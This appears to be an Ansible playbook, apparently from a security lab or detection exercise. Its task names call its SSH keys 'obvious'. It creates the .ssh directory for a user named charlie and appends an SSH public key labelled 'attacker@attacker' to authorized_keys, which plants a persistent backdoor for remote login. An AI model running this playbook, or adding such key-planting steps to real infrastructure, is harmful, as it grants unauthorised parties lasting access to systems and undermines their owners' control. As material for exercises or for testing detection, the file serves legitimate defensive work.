---
- name: "add obvious ssh keys for charlie user"
  hosts: all
  become: yes
  tasks:
    - name: "set up .ssh directory"
      shell: "mkdir /home/charlie/.ssh; touch /home/charlie/.ssh/authorized_keys; chmod 644 /home/charlie/.ssh/authorized_keys"
      become: true
      become_user: charlie
    - name: "add ssh key"
      shell: "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDCrCxnbMXp3wI3b4bUPU97/fQ5ZD+2L9YiLSwnTZBmgImAH3WIiftw+lUSAHrqeZXxibMM8zvXvMJkjkflUqIrfI4dMkoyK/pd/mNKsu7LD503BE8Z+S/fl19nHyklgR3L5tvfeTqxua/npZJdG2+0FZTofidZEjsFy40+N918hI0Wj6JrzAkL6442Eos84UI2Q2lKLoYT6eyFRUJYQdPi/bTIFSzW6CaPVM+RhAJVy3KHHdT4gWFZahUSjerl5zDpd7d1DcHoFV+9ZERQloe3Wkg003B8BHOIMf34RMN1mhmZ8OsDu7CQ3ZxAxUEfh/UKZuWVz/V31NkFdOsazM8we5M/Au2JiLiH8LbUKa35HUWGQB7Y4wMvWGtASa5mlju1W/Uz5uMdE/mr/ucVR9c2VLHOdf/AIzFWODK0kEsZS4DUjqLqk10vKDbhxS2SVHj6nLfuM3J1gaOBpmwzDqdIxrXmnIZGg1EFu41E5kYbfs7g4AAZVim5kdUaNFPJI4ye0eSShiWd+73UjFqPpzwfroModhFhVQhOQ4kKYODqovT6/sirYu/US3d85GnzSXyXtvQ43Bb7gZDcSf+hZOF918iN5PC3C2orIriGuo+HfHjw+pJR4B3JzielWZalTCrtQNcJHV0vU1RHIfumWjnz6NSDdm4+PCfmr42TEYphlw== attacker@attacker' >> /home/charlie/.ssh/authorized_keys"
